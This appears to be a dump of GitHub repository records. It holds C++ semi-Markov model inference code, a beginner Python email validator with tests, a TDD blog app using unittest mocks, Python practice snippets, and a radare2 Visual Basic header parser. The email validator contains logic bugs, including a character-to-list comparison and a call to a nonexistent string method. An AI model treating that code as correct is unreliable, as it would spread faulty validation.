__attribute__((aligned(16)));\n NPRowVectorArray<Type> sumsofar(sumsofar_buf,M);\n Type result_buf[M] __attribute__((aligned(16)));\n NPRowVectorArray<Type> result(result_buf,M);\n Type maxes_buf[M] __attribute__((aligned(16)));\n NPRowVectorArray<Type> maxes(maxes_buf,M);\n#endif\n\n Type cmax;\n ebetal.row(T-1).setZero();\n for(int t=T-1; t>=0; t--) {\n sumsofar.setZero();\n ebetastarl.row(t).setConstant(-1.0*numeric_limits<Type>::infinity());\n for(int tau=0; tau < min(trunc,T-t); tau++) {\n sumsofar += eaBl.row(t+tau);\n result = ebetal.row(t+tau) + sumsofar + eaDl.row(tau);\n maxes = ebetastarl.row(t).cwiseMax(result);\n ebetastarl.row(t) =\n ((ebetastarl.row(t) - maxes).exp() + (result - maxes).exp()).log() + maxes;\n }\n if (right_censoring && T-t-1 < trunc) {\n result = eaBl.block(t,0,T-t,M).colwise().sum() + eaDsl.row(T-1-t);\n maxes = ebetastarl.row(t).cwiseMax(result);\n ebetastarl.row(t) =\n ((ebetastarl.row(t) - maxes).exp() + (result - maxes).exp()).log() + maxes;\n }\n for(int i=0; i<M; i++) {\n if (ebetastarl(t,i) != ebetastarl(t,i)) {\n ebetastarl(t,i) = -1.0*numeric_limits<Type>::infinity();\n }\n }\n if (likely(t > 0)) {\n cmax = ebetastarl.row(t).maxCoeff();\n ebetal.row(t-1) = (eA * (ebetastarl.row(t) - cmax).exp().matrix().transpose()\n ).array().log() + cmax;\n for(int i=0; i<M; i++) {\n if (ebetal(t-1,i) != ebetal(t-1,i)) {\n ebetal(t-1,i) = -1.0*numeric_limits<Type>::infinity();\n }\n }\n }\n }\n }\n\n template <typename Type>\n void messages_forwards_log(\n int M, int T, Type *A, Type *aBl, Type *aDl, Type *aDsl, Type *pil,\n Type *alphal, Type *alphastarl)\n {\n // TODO trunc, censoring\n\n NPMatrix<Type> eA(A,M,M);\n NPArray<Type> eaBl(aBl,T,M);\n NPArray<Type> eaDl(aDl,T,M);\n NPArray<Type> eaDsl(aDsl,T,M);\n NPRowVectorArray<Type> epil(pil,M);\n\n NPArray<Type> ealphal(alphal,T,M);\n NPArray<Type> ealphastarl(alphastarl,T,M);\n\n#ifdef HMM_TEMPS_ON_HEAP\n Array<Type,1,Dynamic> sumsofar(M);\n Array<Type,1,Dynamic> result(M);\n Array<Type,1,Dynamic> maxes(M);\n#else\n Type sumsofar_buf[M] __attribute__((aligned(16)));\n NPRowVectorArray<Type> sumsofar(sumsofar_buf,M);\n Type result_buf[M] __attribute__((aligned(16)));\n NPRowVectorArray<Type> result(result_buf,M);\n Type maxes_buf[M] __attribute__((aligned(16)));\n NPRowVectorArray<Type> maxes(maxes_buf,M);\n#endif\n\n // TODO\n\n }\n\n template <typename FloatType, typename IntType>\n void sample_forwards_log(\n int M, int T, FloatType *A, FloatType *pi0, FloatType *caBl, FloatType *aDl,\n FloatType *betal, FloatType *betastarl, IntType *stateseq, FloatType *randseq)\n {\n NPArray<FloatType> eA(A,M,M);\n NPArray<FloatType> ecaBl(caBl,T+1,M);\n NPArray<FloatType> eaDl(aDl,T,M);\n NPArray<FloatType> ebetal(betal,T,M);\n NPArray<FloatType> ebetastarl(betastarl,T,M);\n NPVectorArray<IntType> estateseq(stateseq,T);\n\n#ifdef HMM_TEMPS_ON_HEAP\n Array<FloatType,1,Dynamic> logdomain(M);\n Array<FloatType,1,Dynamic> nextstate_distr(M);\n#else\n FloatType logdomain_buf[M] __attribute__((aligned(16)));\n NPRowVectorArray<FloatType> logdomain(logdomain_buf,M);\n FloatType nextstate_distr_buf[M] __attribute__((aligned(16)));\n NPRowVectorArray<FloatType> nextstate_distr(nextstate_distr_buf,M);\n#endif\n\n int t = 0, dur, randseq_idx=0;\n IntType state;\n FloatType durprob, p_d_prior, p_d;\n\n nextstate_distr = NPRowVectorArray<FloatType>(pi0,M);\n while (t < T) {\n // use the messages to form the posterior over states\n logdomain = ebetastarl.row(t) - ebetastarl.row(t).maxCoeff();\n nextstate_distr *= logdomain.exp();\n if 
((nextstate_distr == 0.).all()) {\n cout << \"Warning: all-zero posterior state belief, following likelihood\"\n << endl;\n nextstate_distr = logdomain.exp();\n }\n\n // sample from nextstate_distr\n state = util::sample_discrete(M,nextstate_distr.data(),randseq[randseq_idx++]);\n\n // sample from duration pmf\n durprob = randseq[randseq_idx++];\n for(dur=0; durprob > 0. && t+dur < T; dur++) {\n p_d_prior = exp(eaDl(dur,state));\n if (0.0 == p_d_prior) {\n continue;\n }\n p_d = p_d_prior * exp(ecaBl(t+dur+1,state) - ecaBl(t,state)\n + ebetal(t+dur,state) - ebetastarl(t,state));\n durprob -= p_d;\n }\n // NOTE: if t+dur == T, the duration is censored; it will be fixed up in Python\n\n // set the output\n estateseq.segment(t,dur).setConstant(state);\n t += dur;\n nextstate_distr = eA.row(state);\n }\n }\n}\n\n// NOTE: this class exists for cyhton binding convenience\n\ntemplate <typename FloatType, typename IntType = int32_t>\nclass hsmmc\n{\n public:\n\n static void messages_backwards_log(\n int M, int T, FloatType *A, FloatType *aBl, FloatType *aDl, FloatType *aDsl,\n FloatType *betal, FloatType *betastarl, bool right_censoring, int trunc)\n { hsmm::messages_backwards_log(M,T,A,aBl,aDl,aDsl,betal,betastarl,\n right_censoring,trunc); }\n\n static void sample_forwards_log(\n int M, int T, FloatType *A, FloatType *pi0, FloatType *aBl, FloatType *aDl,\n FloatType *betal, FloatType *betastarl,\n IntType *stateseq, FloatType *randseq)\n { hsmm::sample_forwards_log(M,T,A,pi0,aBl,aDl,betal,betastarl,stateseq,randseq); }\n};\n\n#endif\n" } ]
6
mapugliese/basic-email-validation
https://github.com/mapugliese/basic-email-validation
48f046cfdd980511a8a6928c51acf564c5610493
110b43ab7337fea50b6eb1a3a751dffacdd92497
3d07b0e83d07a4677942dfe3f55af1396f3bd58e
refs/heads/main
2023-02-15T09:27:43.339610
2021-01-17T05:17:25
2021-01-17T05:17:25
330,081,161
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.705365002155304, "alphanum_fraction": 0.7080035209655762, "avg_line_length": 41.11111068725586, "blob_id": "d374d1ce531a6274db94389c3afa9c8d0b6552ed", "content_id": "2bf91993bbeb92f756ab40c02dfac01485122b72", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1147, "license_type": "no_license", "max_line_length": 144, "num_lines": 27, "path": "/README.md", "repo_name": "mapugliese/basic-email-validation", "src_encoding": "UTF-8", "text": "# email-validation\nfunction that determines if a string is a valid email address\n\nfrom https://edabit.com/challenge/TBCujkw9D8hrEgFc4:\n\n Basic E-Mail Validation\n Create a function that accepts a string, checks if it's a valid email address and returns either True or False, depending on the evaluation.\n\n The string must contain an @ character.\n The string must contain a . character.\n The @ must have at least one character in front of it.\n e.g. \"[email protected]\" is valid while \"@edabit.com\" is invalid.\n The . and the @ must be in the appropriate places.\n e.g. \"hello.email@com\" is invalid while \"[email protected]\" is valid.\n If the string passes these tests, it's considered a valid email address.\n\n Examples\n validate_email(\"@gmail.com\") ➞ False\n validate_email(\"hello.gmail@com\") ➞ False\n validate_email(\"gmail\") ➞ False\n validate_email(\"hello@gmail\") ➞ False\n validate_email(\"[email protected]\") ➞ True\n\n Notes\n Check the Tests tab to see exactly what's being evaluated.\n You can solve this challenge with RegEx, but it's intended to be solved with logic.\n Solutions using RegEx will be accepted but frowned upon :(\n" }, { "alpha_fraction": 0.4784291982650757, "alphanum_fraction": 0.4900442361831665, "avg_line_length": 34.20000076293945, "blob_id": "4011184f221aad37321faaa0c2f68a83e9dd07c0", "content_id": "b5516389c32284cbbdd62ddeeec45ff113b11395", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1808, "license_type": "no_license", "max_line_length": 77, "num_lines": 50, "path": "/email_validation.py", "repo_name": "mapugliese/basic-email-validation", "src_encoding": "UTF-8", "text": "def is_email(email):\r\n '''Function to determine if a given string is a valid email address'''\r\n\r\n if email.count('@') == 1:\r\n # Splits function into local address and domain\r\n # [email protected] ==> local = 'sample', domain = '@gmail.com'\r\n local = email[0: email.index('@')]\r\n domain = email[email.index('@'):]\r\n\r\n else:\r\n return False\r\n\r\n # Ensures the email has a local address and domain\r\n if len(local) > 0 and len(domain) > 0:\r\n\r\n # A local address cannot begin with the following characters\r\n if local[0] != ['-', '_', '.', '0', '1', '2', '3', '4', '5', '6',\r\n '7', '8', '9']:\r\n\r\n # A local address cannot contain the following characters\r\n # Need for loop bc 'in' can only take a string\r\n for x in ['<', '>', '(' , ')', '[', ']', ';', ':', ',', '@', \r\n R'\\ ']:\r\n\r\n if x in local:\r\n return False\r\n else:\r\n return False\r\n\r\n # The length of web address cannot be longer than 64 and must contain\r\n # and an extension beginning in a period (e.g. 
'.com')\r\n if len(domain) < 64 and domain.count('.') == 1:\r\n\r\n # stores the domain name without the extension\r\n domain_name = domain[1:domain.index('.')]\r\n\r\n # '-' is the only non-alphanumeric character that can be in a\r\n # domain and therefore, it is easiest just to remove it\r\n if '-' in domain_name:\r\n domain_name = domain_name.remove('-')\r\n \r\n # Determines if the domain is alphanumeric\r\n if domain_name.isalnum():\r\n return True\r\n else:\r\n return False\r\n else:\r\n return False\r\n else:\r\n return False" }, { "alpha_fraction": 0.6972318291664124, "alphanum_fraction": 0.6972318291664124, "avg_line_length": 24.363636016845703, "blob_id": "d2aef058df19ae2161e5ea09e591eac99ea9283c", "content_id": "a564eb0da6026ac28dae069c3a2181b8fbeee67e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 578, "license_type": "no_license", "max_line_length": 51, "num_lines": 22, "path": "/email_validation_basic_test.py", "repo_name": "mapugliese/basic-email-validation", "src_encoding": "UTF-8", "text": "import email_validation\r\n\r\nprint(email_validation.is_email('@edabit.com'))\r\n# False\r\nprint(email_validation.is_email('@edabit'))\r\n# False\r\nprint(email_validation.is_email('[email protected]'))\r\n# True\r\nprint(email_validation.is_email(''))\r\n# False\r\nprint(email_validation.is_email('hello.gmail@com'))\r\n# False\r\nprint(email_validation.is_email('[email protected]'))\r\n# True\r\nprint(email_validation.is_email('hello@email'))\r\n# False\r\nprint(email_validation.is_email('%^%$#%^%'))\r\n# False\r\nprint(email_validation.is_email('www.email.com'))\r\n# False\r\nprint(email_validation.is_email('email'))\r\n# False" } ]
3
AndrewOdiit/TDD
https://github.com/AndrewOdiit/TDD
cc9e4f844a916b9c27be29facae5357bc07cf05d
4518d7d824a67ddd4312de9a6abfd37e1f550ebc
5223ed61fad9b4ceccce5a165d4ce92e139dc112
refs/heads/master
2020-08-31T22:35:35.286659
2019-11-27T16:49:18
2019-11-27T16:49:18
218,802,432
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.5345744490623474, "alphanum_fraction": 0.539893627166748, "avg_line_length": 31.69565200805664, "blob_id": "2917c5a49ffc05957b00051fd957eddd6ee773de", "content_id": "bbe170543bd8a95b8df7cb8ae406c9a95b459af1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 752, "license_type": "no_license", "max_line_length": 66, "num_lines": 23, "path": "/TDD/blogapp/tests/integration/test_blog.py", "repo_name": "AndrewOdiit/TDD", "src_encoding": "UTF-8", "text": "from unittest import TestCase\nfrom blogapp.blog import Blog\n\n\nclass Test_Blog(TestCase):\n def test_create_post(self):\n b = Blog(\"andrew's life\", \"andrew\")\n b.create_post(\"hello\", \"hello world\")\n self.assertTrue(type(b.posts) == list)\n\n self.assertEqual(\"hello\", b.posts[0].title)\n self.assertEqual(\"hello world\", b.posts[0].content)\n\n def test_json(self):\n b = Blog(\"andrew's life\", \"andrew\")\n b.create_post(\"hello\", \"hello world\")\n expected = {\"title\": b.title, \"author\": b.author, \"posts\":\n [{\n \"title\": b.posts[0].title,\n \"content\": b.posts[0].content\n }]}\n\n self.assertEqual(expected, b.json())\n" }, { "alpha_fraction": 0.5857142806053162, "alphanum_fraction": 0.6428571343421936, "avg_line_length": 13, "blob_id": "d5b759ee391754bcdc6b9482f44cbd5af8b845e3", "content_id": "a7522b521f7f7f2b097dc85cfd9666f5a2db7d57", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 70, "license_type": "no_license", "max_line_length": 24, "num_lines": 5, "path": "/Pythonrefresher/kargs.py", "repo_name": "AndrewOdiit/TDD", "src_encoding": "UTF-8", "text": "def my_method(*args):\n return sum(args)\n\n\nprint(my_method(22, 33))\n" }, { "alpha_fraction": 0.5581853985786438, "alphanum_fraction": 0.5660749673843384, "avg_line_length": 20.125, "blob_id": "344d339cbc6f08f403b1d7b8728985fec62e900c", "content_id": "f42432a6d2915629eccc7e034de1577f82a48ef7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 507, "license_type": "no_license", "max_line_length": 55, "num_lines": 24, "path": "/Pythonrefresher/deco.py", "repo_name": "AndrewOdiit/TDD", "src_encoding": "UTF-8", "text": "import functools\n\n\ndef decorator_with_args(number):\n def my_decorator(func):\n @functools.wraps(func)\n def function_that_runs_func():\n print(\"In the decorator\")\n if number <= 56:\n return \"not running function...exiting\"\n else:\n func()\n print(\"After decorator\")\n\n return function_that_runs_func\n return my_decorator\n\n\n@decorator_with_args(76)\ndef my_function():\n print(\"Hello\")\n\n\nprint(my_function())\n" }, { "alpha_fraction": 0.6481481194496155, "alphanum_fraction": 0.6481481194496155, "avg_line_length": 14.882352828979492, "blob_id": "8902eadf2b7af4ca691c3aed65830fb45600c04b", "content_id": "3ff1d8b4ac3034d282f341e5b816af4f56e5d315", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 270, "license_type": "no_license", "max_line_length": 34, "num_lines": 17, "path": "/Pythonrefresher/hof.py", "repo_name": "AndrewOdiit/TDD", "src_encoding": "UTF-8", "text": "import functools\n\n\ndef my_decorator(func):\n @functools.wraps(func)\n def function_that_runs_func():\n print(\"In the decorator\")\n func()\n return function_that_runs_func\n\n\n@my_decorator\ndef my_function():\n print(\"I'm the function\")\n\n\nmy_function()\n" }, { "alpha_fraction": 0.5912531614303589, "alphanum_fraction": 
0.5923745632171631, "avg_line_length": 42.087501525878906, "blob_id": "a46b0d4bd74b182afdc88e4ef283899e08fae025", "content_id": "922027edcba75eb448f814d662cc1caab6b8fce7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3567, "license_type": "no_license", "max_line_length": 89, "num_lines": 80, "path": "/TDD/blogapp/tests/system/test_app.py", "repo_name": "AndrewOdiit/TDD", "src_encoding": "UTF-8", "text": "# system tests , test the entry point to the application\nfrom unittest import TestCase\nfrom unittest.mock import patch\nimport blogapp.app as app\nfrom blogapp.blog import Blog\nfrom blogapp.app import MENU_PROMPT\n\n# patch allows you to test a function that would otherwise not be testable\n# A mock object substitutes and imitates a real object within a testing environment\n\n\nclass TestApp(TestCase):\n #this test is not working \n def setUp(self):\n blog = Blog('Test', 'TestAuthor')\n app.blogs = {'Test': blog}\n\n def test_menu_prints_prompt(self):\n with patch(\"builtins.print\") as mocked_print:\n with patch(\"builtins.input\" ,return_value ='q' ):\n app.menu()\n mocked_print.assert_called()\n def test_print_blog(self):\n # an instance of Blog class, has access to all its methods\n with patch('builtins.print') as mocked_print:\n # on printing the blog , the __repr__ method of the blog class will be called\n app.print_blogs()\n mocked_print.assert_called_with(\n 'title:Test , author:TestAuthor, posts:0')\n\n def test_menu_calls_print_blogs(self):\n with patch(\"blogapp.app.print_blogs\") as mocked_print_blogs:\n with patch(\"builtins.input\", return_value ='q'):\n app.menu()\n mocked_print_blogs.assert_called()\n\n def test_app_ask_create_blog(self):\n with patch(\"builtins.input\") as mocked_input:\n mocked_input.side_effect = ('Test', 'Test Author')\n app.ask_create_blog()\n self.assertIsNotNone(app.blogs.get('Test'))\n\n def test_app_ask_to_read_blog(self):\n blog = app.blogs['Test']\n blog.create_post('TestBlog','testing blog')\n with patch('builtins.input', return_value ='Test'):\n with patch('blogapp.app.print_posts') as mocked_print_posts:\n app.ask_read_blog()\n mocked_print_posts.assert_called_with(blog)\n def test_app_create_post(self):\n blog = app.blogs['Test']\n with patch(\"builtins.input\") as mocked_input:\n mocked_input.side_effect = ('Test', 'Testtitle', 'Testcontent')\n app.ask_create_post()\n self.assertTrue(len(blog.posts)> 0)\n self.assertEqual(blog.posts[0].title , \"Testtitle\")\n self.assertEqual(blog.posts[0].content , \"Testcontent\")\n\n #when you mock a method , the real method is replaced with a mock\n #therefore the real method is not actually called.\n def test_menu_calls_create_blog(self):\n with patch(\"builtins.input\") as mocked_input:\n mocked_input.side_effect =('c', 'testTitle', 'testAuthor','q')\n app.menu()\n #mocked_create_blog.assert_called()\n self.assertIsNotNone(app.blogs.get('testTitle'))\n\n def test_menu_calls_ask_read_blog(self):\n with patch(\"blogapp.app.ask_read_blog\") as mocked_read_blog:\n with patch(\"builtins.input\") as mocked_input:\n mocked_input.side_effect =('r', 'Test','q')\n app.menu()\n mocked_read_blog.assert_called()\n\n def test_menu_calls_ask_create_post(self):\n with patch(\"blogapp.app.ask_create_post\") as mocked_read_blog:\n with patch(\"builtins.input\") as mocked_input:\n mocked_input.side_effect =('p','Test','q')\n app.menu()\n mocked_read_blog.assert_called()\n \n \n\n \n\n\n\n \n\n \n \n \n \n\n\n \n\n\n\n\n \n" }, { "alpha_fraction": 
0.6029411554336548, "alphanum_fraction": 0.6323529481887817, "avg_line_length": 21.66666603088379, "blob_id": "c2cba6f3e524e36140336888eaaea1b58ef7365a", "content_id": "268f77eef55eff3e9dac805c93cddcfbdcbff07c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 204, "license_type": "no_license", "max_line_length": 73, "num_lines": 9, "path": "/Pythonrefresher/comps.py", "repo_name": "AndrewOdiit/TDD", "src_encoding": "UTF-8", "text": "student = {'name': 'jose', 'school': 'Computing', 'grades': (66, 77, 88)}\n\n\ndef average_grade(data: dict):\n grades = data['grades']\n return sum(grades) / len(grades)\n\n\nprint(average_grade(student))\n" }, { "alpha_fraction": 0.6179921627044678, "alphanum_fraction": 0.6310299634933472, "avg_line_length": 26.321428298950195, "blob_id": "716c27569ca0f31e28fdf05e5786afd1c6d6068a", "content_id": "7a5b21cfbc744bf6541130f7ec2253a60c409dff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 767, "license_type": "no_license", "max_line_length": 72, "num_lines": 28, "path": "/Pythonrefresher/OOP.py", "repo_name": "AndrewOdiit/TDD", "src_encoding": "UTF-8", "text": "\n\nclass Student:\n def __init__(self, name, school):\n self.name = name\n self.school = school\n self.marks = []\n\n def average(self):\n return sum(self.marks)/len(self.marks)\n\n @classmethod\n def friend(cls, name, origin, *args):\n return cls(name, origin.school, *args)\n\n\nclass WorkingStudent(Student):\n def __init__(self, name, school, salary, job_title):\n super().__init__(name, school)\n self.salary = salary\n self.job_title = job_title\n\n\n# school\nstudent = Student(\"Andrew\", \"USIU\")\nfriend = Student.friend(\"Slim\", student)\nanna = WorkingStudent(\"Anna\", \"USIU\", 4000.00, \"HR Manager\")\nprint(anna.salary)\nfriend = WorkingStudent.friend(\"Jason\", anna, 3800, \"Software Engineer\")\nprint(friend.salary)\n" }, { "alpha_fraction": 0.6303501725196838, "alphanum_fraction": 0.6303501725196838, "avg_line_length": 33.266666412353516, "blob_id": "5277746e38c19ab60ef7591b08efc9c42dade6a3", "content_id": "6f871d636e5874711febfd4726cdf934764e15b8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 514, "license_type": "no_license", "max_line_length": 100, "num_lines": 15, "path": "/TDD/blogapp/tests/unit/test_blog.py", "repo_name": "AndrewOdiit/TDD", "src_encoding": "UTF-8", "text": "import unittest\nfrom blogapp.blog import Blog\nfrom blogapp.post import Post\n\n\nclass BlogTest(unittest.TestCase):\n def test_create_blog(self):\n b = Blog(\"andrew's life\", \"andrew\")\n self.assertEqual(\"andrew's life\", b.title)\n self.assertEqual(\"andrew\", b.author)\n\n def test_repr_method(self):\n b = Blog(\"Andrew's blog\", \"andrew\")\n self.assertTrue(type(b.__repr__()) == str)\n self.assertEqual(f\"title:{b.title} , author:{b.author}, posts:{len(b.posts)}\", b.__repr__())\n" }, { "alpha_fraction": 0.43589743971824646, "alphanum_fraction": 0.5780885815620422, "avg_line_length": 20.450000762939453, "blob_id": "124615fac316a7771bb55e0621a9ec0a4545cc73", "content_id": "a8029678ca3a490083ff6726a442e6e3cc97fc94", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 429, "license_type": "no_license", "max_line_length": 55, "num_lines": 20, "path": "/Pythonrefresher/lts.py", "repo_name": "AndrewOdiit/TDD", "src_encoding": "UTF-8", "text": "# set1 = {1, 2, 3, 4, 5, 6, 9}\n\n# set2 
= {5, 12, 4, 7, 9, 15, 12}\n\n# set_comp = {x for x in set1 if x in set2} # method 1\n\n# intersect = set1.intersection(set2)\n# print(set_comp)\n# print(intersect)\n# print(set1.union(set2)) # without repeatition\n# print(set1.difference(set2))\n\nmy_list = [30, 60, 10]\nmy_tuple = (1,)\n\n# set1 = {1, 2, 3, 4, 5, 6, 9, 12, 77}\n\n# set2 = {5, 12, 7, 9, 15, 12, 77}\n\n# print(set1.intersection(set2))\n" }, { "alpha_fraction": 0.6459459662437439, "alphanum_fraction": 0.6459459662437439, "avg_line_length": 20.764705657958984, "blob_id": "36f6cb5ff12965765b3a12e5a125f33bab4a3521", "content_id": "c87e4119c40b565a2342778befc96f58f9d2ec95", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 370, "license_type": "no_license", "max_line_length": 61, "num_lines": 17, "path": "/Pythonrefresher/loops.py", "repo_name": "AndrewOdiit/TDD", "src_encoding": "UTF-8", "text": "people_you_know = []\n\n\ndef who_do_you_know():\n friends = input('please enter a list of people you know')\n friends = friends.strip() # remove whitespace\n people_you_know = friends.split()\n return ask_user(people_you_know)\n\n\ndef ask_user(lst) -> bool:\n name = input(\"please enter a name: \")\n print(lst)\n return name in lst\n\n\nprint(who_do_you_know())\n" }, { "alpha_fraction": 0.5844544172286987, "alphanum_fraction": 0.5844544172286987, "avg_line_length": 32.29999923706055, "blob_id": "35b884d9c7a02a5d6860d9a4b20d74cb0cd1226e", "content_id": "7f45ad1702fa500b7982209829524af234e191c3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 669, "license_type": "no_license", "max_line_length": 84, "num_lines": 20, "path": "/TDD/blogapp/blog.py", "repo_name": "AndrewOdiit/TDD", "src_encoding": "UTF-8", "text": "from TDD.blogapp import post\nclass Blog:\n def __init__(self, title, author):\n self.title = title\n self.author = author\n self.posts = []\n\n def __repr__(self):\n return f\"title:{self.title} , author:{self.author}, posts:{len(self.posts)}\"\n\n def create_post(self, title, content):\n if(title is None or content is None):\n return f\"expected string instead got {title or content}\"\n p = post.Post(title, content)\n self.posts.append(p)\n return self.posts\n\n def json(self):\n return {\"title\": self.title, \"author\": self.author, \"posts\":\n [post.json() for post in self.posts]}\n\n\n\n" }, { "alpha_fraction": 0.6213592290878296, "alphanum_fraction": 0.6213592290878296, "avg_line_length": 33.33333206176758, "blob_id": "ea8178e79b47e5f8abfe98eaa7cc901f0cc1a9ea", "content_id": "2790da595de8967e50e0c0253f3663adc9473983", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 515, "license_type": "no_license", "max_line_length": 78, "num_lines": 15, "path": "/TDD/blogapp/tests/unit/test_post.py", "repo_name": "AndrewOdiit/TDD", "src_encoding": "UTF-8", "text": "from unittest import TestCase\nfrom blogapp.post import Post\n\n\nclass TestPosts(TestCase):\n def test_post(self):\n post = Post(\"andrew\", \"my first post\")\n self.assertTrue(type(post.title) == str and type(post.content) == str)\n\n def test_json(self):\n # returns title and content\n post = Post(\"my first post\", \"This is my first post\")\n expected = {'title': \"my first post\",\n 'content': \"This is my first post\"}\n self.assertDictEqual(post.json(), expected)\n" }, { "alpha_fraction": 0.6491228342056274, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 20.375, "blob_id": 
"b893c385d9b4a83ced8975db209019772067de7b", "content_id": "b52d6acf71a2b9a35e70f7e928319bd0ddd6f39e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 171, "license_type": "no_license", "max_line_length": 33, "num_lines": 8, "path": "/TDD/blogapp/tests/unit/test_add.py", "repo_name": "AndrewOdiit/TDD", "src_encoding": "UTF-8", "text": "import unittest\nfrom blogapp.add import add_nums\n\n\nclass TestAdd(unittest.TestCase):\n def test_add(self):\n res = add_nums(1, 2)\n self.assertEqual(3, res)\n" }, { "alpha_fraction": 0.5924637913703918, "alphanum_fraction": 0.5924637913703918, "avg_line_length": 30.03636360168457, "blob_id": "e7ae72abb1ff828c691f3b0a5a6ff1ce98ebb915", "content_id": "ee537898007fec26b65ba86589785ef742b648dc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1725, "license_type": "no_license", "max_line_length": 105, "num_lines": 55, "path": "/TDD/blogapp/app.py", "repo_name": "AndrewOdiit/TDD", "src_encoding": "UTF-8", "text": "from TDD.blogapp import blog\nfrom TDD.blogapp import post\nMENU_PROMPT = \"Enter 'c' to create a blog , 'l' to list blogs, 'r' to read one , 'p' to create a post: \"\nblogs = dict()\n\ndef print_blogs():\n for _, blog in blogs.items():\n print(f'{blog}')\n\ndef ask_create_blog():\n #ask the user for new bog title and name\n #store it in blogs dictionary\n blog_title = input(\"Enter blog title: \")\n blog_author = input(\"Enter blog author: \")\n blogs[blog_title] = blog.Blog(blog_title, blog_author)\n\ndef ask_create_post():\n blog_title = input(\"please enter name of blog to create post in: \")\n if (blog_title in blogs):\n print(\"input is valid\")\n post_title = input(\"please enter a post title: \")\n post_content = input(\"please enter post content: \")\n blogs[blog_title].create_post(post_title, post_content)\n else:\n print(\"This blog does not exist, please enter a valid blog name\")\n \ndef ask_read_blog():\n blog_name = input(\"Please enter the name of a blog to read: \")\n if(blogs.get(blog_name) is None):\n return \"This blog is not available\"\n else:\n blog = blogs.get(blog_name)\n return print_posts(blog)\n \ndef print_posts(blog):\n for post in blog.posts:\n print_post(post)\n\ndef print_post(post):\n print(f\"{post.title} , {post.content}\")\n\ndef menu():\n print_blogs()\n choice = input(MENU_PROMPT)\n while choice !='q':\n if choice == 'c':\n ask_create_blog()\n elif choice == 'r':\n ask_read_blog()\n elif choice == 'p':\n ask_create_post()\n elif choice =='l':\n print_blogs()\n choice = input(MENU_PROMPT)\n return 'goodbye'\n \n\n\n \n\n\n\n" } ]
14
Trietptm-on-Coding-Algorithms/r2_scripts
https://github.com/Trietptm-on-Coding-Algorithms/r2_scripts
19cd0826ef4c7e7d6aa425193200747eb8138748
91af4afe287385255e58f58e39ce5a78097141df
2815b55c1450bc9a66c807f6bbac2355945d37ee
refs/heads/master
2021-10-08T06:01:35.366063
2018-12-08T16:01:24
2018-12-08T16:01:24
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7291666865348816, "alphanum_fraction": 0.7583333253860474, "avg_line_length": 25.66666603088379, "blob_id": "3374fde8fe30ee9daab47d1cb2af43071f0de628", "content_id": "84ae584770e4f25c068f1b3e389f6268f8d9ca99", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 240, "license_type": "no_license", "max_line_length": 80, "num_lines": 9, "path": "/README.md", "repo_name": "Trietptm-on-Coding-Algorithms/r2_scripts", "src_encoding": "UTF-8", "text": "# Radare2 scripts\n\nVarious radare2 scripts I use (or create). Only works with Python2 since python3\nr2pipe bindings seem broken now.\n\n## vb_analysis.py\n\nUsage: invoke it with `#!pipe python2 vb_analysis.py` inside a r2 (or cutter)\nsession.\n" }, { "alpha_fraction": 0.5395718812942505, "alphanum_fraction": 0.6040928363800049, "avg_line_length": 39.38660430908203, "blob_id": "e1050ca6b3efd39fe90de380066aa029914ff858", "content_id": "b600b48af53d4c9e2414b0e63d6873fb95d13f54", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 26534, "license_type": "no_license", "max_line_length": 122, "num_lines": 657, "path": "/vb_analysis.py", "repo_name": "Trietptm-on-Coding-Algorithms/r2_scripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# Port of \"VB Exe Parser\" script to radare2 by aaSSfxxx\n# Original credits to Vic P. aka vic4key (vic4key[at]gmail.com)\n# Original script: https://github.com/Kinimiwar/VB-Exe-Parser/\n\nimport r2pipe\nimport ctypes\nimport sys\n\nclass CVBHeader(ctypes.Structure):\n _fields_ = [\n (\"szVbMagic\", ctypes.c_ubyte*4), # 0x0. \"VB5!\"\" String\n (\"wRuntimeBuild\", ctypes.c_ushort), # 0x4. Build of the VB6 Runtime\n (\"szLangDll\", ctypes.c_ubyte*14), # 0x6. Language Extension DLL\n (\"szSecLangDll\", ctypes.c_ubyte*14), # 0x14. 2nd Language Extension DLL\n (\"wRuntimeRevision\", ctypes.c_ushort), # 0x22. Internal Runtime Revision\n (\"dwLCID\", ctypes.c_uint), # 0x24. LCID of Language DLL\n (\"dwSecLCID\", ctypes.c_uint), # 0x28. LCID of 2nd Language DLL\n (\"lpSubMain\", ctypes.c_uint), # 0x2C. Pointer to Sub Main Code\n (\"lpProjectData\", ctypes.c_uint), # 0x30. Pointer to Project Data\n (\"fMdlIntCtls\", ctypes.c_uint), # 0x34. VB Control Flags for IDs < 32\n (\"fMdlIntCtls2\", ctypes.c_uint), # 0x38. VB Control Flags for IDs > 32\n (\"dwThreadFlags\", ctypes.c_uint), # 0x3C. Threading Mode\n (\"dwThreadCount\", ctypes.c_uint), # 0x40. Threads to support 